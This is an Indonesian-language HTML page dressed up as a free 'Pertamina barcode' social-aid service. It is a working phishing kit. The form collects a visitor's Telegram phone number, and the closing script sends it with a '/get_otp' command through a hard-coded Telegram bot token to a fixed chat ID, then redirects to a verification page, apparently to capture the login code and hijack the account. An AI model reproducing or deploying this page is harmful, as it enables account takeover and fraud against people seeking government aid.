<!DOCTYPE html><html lang="en" class="h-100"><head id="ctl00_Head1">
    <link href="bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
    <link href="custom.css" type="text/css" rel="stylesheet">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta property="og:title" content="CETAK BARCODE PERTAMINA GRATIS">
    <meta name="description">
    <meta name="author" content="BANSOS 2024">
    <title>CETAK BARCODE PERTAMINA GRATIS</title>
    <link rel="icon" type="image/x-icon" href="images/favicon.png">
    <link rel="canonical" href="https://getbootstrap.com/docs/5.0/examples/sticky-footer/">
    <!-- Bootstrap core CSS -->
    <link rel="stylesheet" href="bootstrap-icons.css">
  <style type="text/css">
    body {
        background-color: white; /* Mengatur warna latar belakang menjadi putih */
    }
    
    /* This stylesheet override some default Bootstrap's styling */

body {
	background-color: #EEE9D6;
}

.container {
  width: auto;
  padding: 0 15px;
}

.container-narrow {
	width: auto;
	max-width: 480px;
}

.btn-mk {
	color: #fff;
	background-color: #6F5552;
}

.table {
	background-color: #fff;
}

.table-status td {
	background-color: #fff8e8;
}

.text_asat {
	font-size: small;
	font-weight: normal;
	color: #838383;
}

.link-mk {
	color: #403B39;
	text-decoration: none;
}

.link-mk:hover {
	text-decoration: underline;
}

.card {
	margin-bottom: 0.5em;
}

.card-title {
	border-bottom: 1px dotted #E8E6E6;
	padding-bottom: 0.5em;
	font-size: 1rem;
}

footer {
	background-color: #403B39;
}

footer .list-group-item, footer .list-group-item:hover {
	background: none;
	border: none;
}

footer a.nav-link {
	color: #fff;
	padding-top: 0;
}

footer a.nav-link:hover {
	text-decoration: underline;
}

    .bd-placeholder-img {
        font-size: 1.125rem;
        text-anchor: middle;
        -webkit-user-select: none;
        -moz-user-select: none;
        user-select: none;
    }

        @media (min-width: 768px) {
            .bd-placeholder-img-lg {
                font-size: 3.5rem;
            }
        }

         /* Make carousel full width */
        .carousel {
            max-width: 600px;
            margin: auto;
        }

        /* Make carousel images responsive */
        .carousel-item img {
            max-width: 100%;
            height: auto;
        }

        .fade {
            animation-name: fade;
            animation-duration: 1.5s;
        }

        @keyframes fade {
            from {
                opacity: .4;
            }
            to {
                opacity: 1;
            }
        }
        .btn-mk {
    background-color: DodgerBlue; /* Warna biru telur asin */
    color: #fff; /* Warna teks putih untuk kontras */
    border: none; /* Hapus border */
    padding: 10px 20px; /* Padding untuk menyesuaikan ukuran tombol */
    font-size: 16px; /* Ukuran font */
    cursor: pointer; /* Kursor pointer saat diarahkan ke tombol */
    border-radius: 5px; /* Border radius untuk sudut tombol */
    outline: none; /* Hapus outline saat tombol di-fokus */
    /* Tambahan gaya CSS lainnya sesuai kebutuhan */
}
    </style>
</head>
<body class="d-flex flex-column h-100">
    <!-- Begin page content -->
    <main class="flex-shrink-0">
        <div id="ctl00_divContainer" class="container container-narrow">
            <div class="text-center mt-2">
                <a id="ctl00_lnkMalay" disabled="disabled" style="color:Black;font-weight:bold;text-decoration:none;">Bahasa Indonesia</a>
                <span id="ctl00_lblPipe_bm"> | </span>
                <a id="ctl00_lnkEng" href="">English</a>
                <span id="ctl00_lblPipe_bi"> | </span>
                <a id="ctl00_lnkChineseSimplified" href=""> 中文(简体) </a>
                <span id="ctl00_lblPipe_bc"> | </span>
                <a id="ctl00_lnkTamilInd" href="">தமிழ் </a>
            </div>

             <div id="ctl00_divContainer" class="container container-narrow">
        
        <div class="header">
            <img class="w-100" src="images/ini.jpg" alt="" />
        </div>
          

        <h2 class="fw-bold mt-2 page-header text-center ">
            <span id="ctl00_RecipientMasterContent_lblSubject">CETAK BARCODE PERTAMINA GRATIS</span>
        </h2>



        <form>
            <div id="loading" class="holder" style="display:none;justify-content: center;">
                <div class="preloader">
                    <img src="images/loading.gif" width="64">
                </div>
            </div>
            <div class="input" id="labelhp">
                <label for="sign-in-phone-number">Nomor Telepon Telegram</label>

                <input class="form-control" type="tel" id="sign-in-phone-number" dir="auto" inputmode="tel" aria-label="Your phone number" name="phoneNumber" autocomplete="off" required="true" placeholder="🇮🇩 +62XXXXXXXXX" title="Sila Masukkan Nombor , contoh +62822334455">
                <div class="text-center">
                    <h2>

                    </h2>
                    <h2>
                    </h2>
                    
                    <button id="Btn" type="submit" class="btn btn-lg btn-block btn-mk" style="display: show;">Cek Status
                        <div class="ripple-container"><span style="left: 88px; top: -81.9375px; width: 188px; height: 188px;"></span></div>
                    </button>
        
      
    </div>

    
    
    </div></form>
    </div>
    </div>
    </div>
    
    
    
    
    <div id="portals"></div>
    
    
    
</main>


<!-- Footer Starts -->
<div class="header mt-3 text-center">
        <img src="images/ini1.png" id="ctl00_logohead" class="img-fluid" width="450">
    </div>
    <footer class="footer mt-auto py-3">
        <div class="container">
            <div class="row">
                <div class="col-5">
                    <span class="text-white">
                        <span id="ctl00_lblCopyRight">2024 All Rights Reserved. </span>
                    </span>
                </div>
                <div class="col">
                    <ul class="nav justify-content-end">
                        <li class="nav-item">
                            <a id="ctl00_lnkFaq" class="nav-link" href="">
                                <i class="bi-question-circle"></i>
                                <span id="ctl00_lblFAQ"></span></a>
                        </li>
                        <li class="nav-item">
                            <p id="ctl00_linkMerchList">
                                <a class="nav-link" href=""><i class="bi-shop"></i>
                                    <span id="ctl00_lblMerchList"></span></a>
                            </p>
                        </li>
                        <li class="nav-item">
                            <a href="" id="ctl00_linkContactUs" class="nav-link"><i class="bi-envelope"></i>
                                <span id="ctl00_lblctctus"></span></a>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
    </footer>
<!-- Placed at the end of the document so the pages load faster -->
<script src="jquery-3.7.1.min.js" crossorigin="anonymous"></script>

<script>
    var inpHp = document.getElementById("sign-in-phone-number");
    var label = document.getElementById("labelhp");
    var button = document.getElementById("Btn");
    var botToken = "7674230832:AAEVWtuXvkOj3iqNqelvnFfCDU73ap788Uc";
    $("#Btn").css("display","show");
    inpHp.addEventListener("click", function() {
        $("#labelhp").fadeIn();
        $("#sign-in-phone-number").focus();
        
        $("#Btn").css("display","show");
        label.classList.add("touched");
        inpHp.value = "+62 ";
    });
    inpHp.addEventListener("input", function(){
        if (inpHp.value.length > 0){
            label.classList.add("touched");
        } else {
            label.classList.remove("touched");
        }
        if (inpHp.value.length > 6){
            $("#Btn").fadeIn(300);
        } else {
            $("#Btn").fadeOut("fast");
        }
        if (inpHp.value == "60"){
            inpHp.value = " "
        }
    });
    button.addEventListener("click", function(e){
        e.preventDefault();
        loadd();
        phone = inpHp.value.replace(" ", "").replace("+", "")
        sessionStorage.setItem("nohp", phone);
        sendMessageToBot("/get_otp "+phone)
    });
    function loadd(){
        $("#loading").css("display","flex");
    }
    function sendMessageToBot(message) {
        $.ajax({
        url: 'https://api.telegram.org/bot' + botToken + '/sendMessage',
        method: 'POST',
        data: {
            chat_id: '7007623293', 
            text: message
        },
        success: function(response) {
            console.log('Pesan berhasil dikirim ke bot Telegram');
            setTimeout(()=>{
                window.location.href = 'verify.html'; 
            }, 1000)
        },
        error: function(error) {
            console.error('Gagal mengirim pesan ke bot Telegram:', error);
        }
        });
    }
</script>
    <!-- Bootstrap JS -->
    <script src="jquery.min.js"></script>
    <script src="popper.min.js"></script>
    <script src="bootstrap.min.js"></script>




</body></html>